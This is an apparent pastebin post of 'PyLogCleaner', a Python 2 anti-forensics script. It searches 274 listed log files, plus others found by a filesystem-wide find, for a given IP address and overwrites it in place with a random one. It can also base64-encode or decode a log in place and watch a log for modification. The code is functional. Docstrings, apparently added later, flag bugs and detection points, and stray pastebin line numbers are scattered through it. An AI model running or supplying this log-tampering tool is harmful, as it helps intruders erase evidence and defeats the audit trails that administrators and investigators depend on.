salAnon

Python Logcleaner

Feb 18th, 2012
  1. #!/usr/bin/python
# PyLogcleaner uses the given list (logfiles) containing
# 274 logfiles and uses the linux find
# cmd to try to locate more logfiles to search
# for an ip address to replace with a randomly generated
# one. It can also encrypt/d3crypt a
# logfile and can also watch a logfile for modifications.
  8.  
  9.  
  10. import os, sys, time, pwd, getopt, re, random, StringIO, commands
  11.  
def title():
    """Print the tool banner followed by a separator rule."""
    banner_lines = (
        "\n   PyLogCleaner v1.0",
        "-----------------------------------------------",
    )
    for line in banner_lines:
        print(line)
  15.  
def usage():
    """Print the banner and the command-line option summary.

    Documentation note: the -h/-help entry listed here is not handled by
    the dispatch code at the bottom of the script, and -e/-d apply base64
    encoding (see encrypter/d3crypter), not encryption.
    """
    title()
    option_lines = (
        "\n  Usage: python logcleaner.py <option>\n",
        "\t[options]",
        "\t   -i <ip>: Ip to search for and replace",
        "\t   -e <file>: Encrypts logfile",
        "\t   -d <file>: Decrypts logfile",
        "\t   -w/-watch <file> <time to check> : Watches logfile for modification",
        "\t   -h/-help: Prints this menu\n",
    )
    for line in option_lines:
        print(line)
  25.  
def timer():
    """Return the current local time as an asctime()-style string."""
    # time.ctime() without an argument is asctime(localtime(time())).
    return time.ctime()
  29.  
def validater(logs):
    """Keep only the entries of *logs* that are existing regular files.

    Prints the number of candidates and the number of files that exist.
    Exits the process with status 1 when none of the paths exists, since
    the caller would have nothing to search. Returns the surviving paths
    as a list, in their original order.
    """
    out = sys.stdout
    out.write("[+] Validating: %s logfiles\n\n" % len(logs))
    existing = [path for path in logs if os.path.isfile(path)]
    if not existing:
        out.write("[-] No Active Logs Found\n")
        sys.exit(1)
    out.write("[+] Active Logs Found: %s\n" % len(existing))
    return existing
  44.        
def search(logfiles):
    """Overwrite the first occurrence of the global `ip` in each of *logfiles*.

    Reads two module globals bound by the script's -i branch: `ip`, the
    text searched for (used verbatim, not validated as an address), and
    `randip`, the replacement text (a string by then, because the script
    rebinds the name `randip` to the function's result). Each path is
    opened read/write and memory-mapped; a path that cannot be opened is
    skipped without any message by the IOError handler below.

    What the code observably does, for anyone examining a touched file:
    the replacement is an in-place overwrite at the match offset, so the
    file size is unchanged; only the first match per file is written;
    `randip` is written with its own length (no length matching against
    `ip`). Only local files are modified, so a copy shipped to a remote
    or centralised log collector is unaffected and can be compared.
    """
    print "\n[+] Searching:",ip,"\n"
    import mmap

    for file in logfiles:                       # `file` shadows the builtin name
        try:
            f = open(file, "rb+")               # never closed explicitly; relies on refcounting
            size = os.path.getsize(file)
            # Skip empty files: mmap rejects a zero-length mapping.
            if size >= 1:
                data = mmap.mmap(f.fileno(), size)
                loc = data.find(ip)             # first match only
                if loc == -1:
                    #print "[+] File:",file,"|",size,"bytes"
                    #print "\t[-] IP not found"
                    data.close()
                else:
                    print "-"*45
                    print "[+] File:",file,"|",size,"bytes"
                    print "\t[+] IP found"
                    data.seek(loc)
                    data.write(randip)          # writes len(randip) bytes at loc
                    print "[+] Replaced: ",ip,">>",randip
                    print "[+] New_Size:",os.path.getsize(file),"bytes"
                    print "-"*45
                    data.close()
        except(IOError), msg:
            pass                                # unopenable file: silently skipped
    print "\n[+] Done:",timer(),"\n"
  75.                    
def findlogs():
    """Append log-like paths found by `find` to the module-global `logs`.

    Side effects: changes the working directory to "/" (never restored),
    runs `find . -iname *log -perm -444 -print` through a shell via
    commands.getstatusoutput, and mutates the global list `logs` in place.
    Returns that same list. Every output line that does not contain
    "Permission denied" is kept, with its trailing newline removed.

    Notes: `*log` is unquoted, so the shell may expand it against the
    current directory before find receives it. commands.getstatusoutput
    merges stderr into stdout, which is why error lines have to be
    filtered by their text. A shell-spawned, filesystem-wide find issued
    by a Python process is a noisy, auditable event (process accounting,
    exec auditing), which makes this step a natural detection point.
    """
    os.chdir("/")

    print "[+] Finding More Logfiles..."
    # Run the linux find cmd to look for more files whose name ends in "log"
    # (case-insensitive) and that have all three read bits set (-perm -444).
    logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()
    if len(logz)>0:
        print "[+] Found:",len(logz),"extra logfiles"
        for log in logz:
            if re.search("Permission denied",log) == None:
                logs.append(log[:-1])           # drop the trailing newline
    return logs
  88.    
def randip():
    """Return a random dotted-quad string with each octet in 1..255.

    Uses the non-cryptographic `random` module and does not avoid reserved
    ranges. Note that the script's -i branch rebinds the name `randip` to
    this function's result, so it is callable only once per run.
    """
    octets = [random.randrange(255) + 1 for _ in range(4)]
    return ".".join(str(octet) for octet in octets)
  97.  
def gettime():
    """Return the mtime of the module-global `logfile` as an asctime() string."""
    # time.ctime(secs) is asctime(localtime(secs)).
    return time.ctime(os.path.getmtime(logfile))
  101.  
def getsize():
    """Return the size in bytes of the module-global `logfile`."""
    return os.path.getsize(logfile)
  105.  
def modlast(logfile):
    """Poll *logfile* and report each change of its modification time.

    The poll interval is read from sys.argv[3] directly rather than from a
    parameter; the function exits with status 1 when it is absent, and a
    non-integer value is not handled (int() raises ValueError). Prints the
    owner (pwd lookup of st_uid), size and mtime, then loops forever,
    sleeping the given number of seconds between checks; it only ends on an
    interrupt. gettime()/getsize() read the module-global `logfile`, so the
    parameter of the same name (which shadows that global here) only feeds
    the initial prints; the script's -w branch binds both to the same path.
    """
    try:
        sys.argv[3]
    except(IndexError):
        print "\n[-] Need a time in seconds (ex: 60)\n"
        sys.exit(1)

    print "[+] Analyzing:",logfile
    print "[+] Time:",sys.argv[3],"secs"
    print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]    # stat index 4 is st_uid
    print "[+] Size:",getsize(),"bytes"
    print "[+] Last Modified:",gettime()
    print "[+] Starting:",timer()

    old_time = gettime()
    while True:
        time.sleep(int(sys.argv[3]))
        new_time = gettime()
        # asctime() strings have one-second resolution, so several writes
        # within the same second are reported once at most.
        if new_time != old_time:
            print "\n[+] File Modified:",new_time
            print "[+] New Size:",getsize(),"bytes\n"
            old_time = new_time
  128.    
def encrypter(file):
    """Replace the contents of *file* with their base64 encoding.

    Despite the name this is encoding, not encryption: no key is involved
    and any base64 decoder restores the original text. Steps: read the
    whole file (exit 1 on IOError), delete it, wait two seconds, create a
    new file at the same path and write the encoded text. Because the
    original is removed before the new file is written, any failure in
    between loses the data, and the recreated file is a new inode with the
    invoking user's ownership and umask-derived mode rather than the
    original's. The size print precedes the try block, so a missing path
    raises OSError there instead of reaching the IOError handler. The read
    handle is never closed explicitly.
    """
    import base64
    print "\n[+] Encrypting:",file                 # `file` shadows the builtin name
    print "[+] Size:",os.path.getsize(file),"bytes"
    try:
        log2encode = open(file, "r").read()
    except(IOError):
        print "Error: Check your full path.\n"
        sys.exit(1)
    log2encode = base64.b64encode(log2encode)
    os.remove(file)
    time.sleep(2)                                   # the reason for this delay is not stated
    f = open(file, "a")                             # the path was just removed, so this creates a fresh file
    f.write(log2encode)
    f.close()
    print "[+] NewSize:",os.path.getsize(file),"bytes"
    print "[+] Done\n"
  146.  
def d3crypter(file):
    """Replace the contents of *file* with their base64 decoding.

    Inverse of encrypter(): plain base64 decoding, no key. Steps: read the
    whole file (exit 1 on IOError), delete it, wait two seconds, create a
    new file at the same path and write the decoded bytes. Malformed
    base64 input makes b64decode raise, which is not caught. As in
    encrypter(), the original is removed before the replacement is
    written, the recreated file is a new inode owned by the invoking user
    with a umask-derived mode, the size print before the try block raises
    OSError for a missing path, and the read handle is never closed
    explicitly.
    """
    import base64
    print "\n[+] Decrypting:",file                 # `file` shadows the builtin name
    print "[+] Size:",os.path.getsize(file),"bytes"
    try:
        b2log = open(file, "r").read()
    except(IOError):
        print "Error: Check your full path.\n"
        sys.exit(1)
    b2log = base64.b64decode(b2log)
    os.remove(file)
    time.sleep(2)                                   # the reason for this delay is not stated
    f = open(file, "a")                             # the path was just removed, so this creates a fresh file
    f.write(b2log)
    f.close()
    print "[+] NewSize:",os.path.getsize(file),"bytes"
    print "[+] Done\n"
  164.  
# ---- command-line dispatch (module level; runs on import as well) ----
# Fewer than two arguments: show usage and exit with status 1.
if len(sys.argv) <= 1:
    usage()
    sys.exit(1)
# Exactly one argument (an option with no operand, which is also where
# -h/-help ends up): show usage and exit with status 1.
if len(sys.argv) == 2:
    usage()
    sys.exit(1)

# Options are tested with independent `if`s rather than elif; an option
# that matches none of them falls through and the script ends with
# status 0 and no output.
if sys.argv[1] == "-w" or sys.argv[1] == "-watch":
    logfile = sys.argv[2]           # module global read by gettime()/getsize()
    if os.path.isfile(logfile) == False:
        title()
        print "\n[-] Cannot Open File, Check Full Path!!!\n"
        sys.exit(1)
    else:
        title()
        modlast(logfile)            # loops forever; control never returns here
if sys.argv[1] == "-i":
    ip = sys.argv[2]                # module global read by search(); searched for verbatim
    try:
        # Read relative to the starting directory; findlogs() below chdirs to "/".
        logs = open("logfiles", "r").readlines()
    except(IOError):
        print "Error: logfiles missing\n"
        sys.exit(1)
    title()
    print "\n[+] Starting:",timer()
    print "[+] Loaded:",len(logs),"logs"
    findlogs()                      # extends the global `logs` in place; return value unused
    randip = randip()               # rebinds the function name to one generated string, read by search()
    print "[+] Generate Random IP:",randip
    search(validater(logs))
if sys.argv[1] == "-e":
    file = sys.argv[2]              # shadows the builtin name
    title()
    encrypter(file)                 # base64-encodes the file in place (not encryption)
if sys.argv[1] == "-d":
    file = sys.argv[2]
    title()
    d3crypter(file)                 # base64-decodes the file in place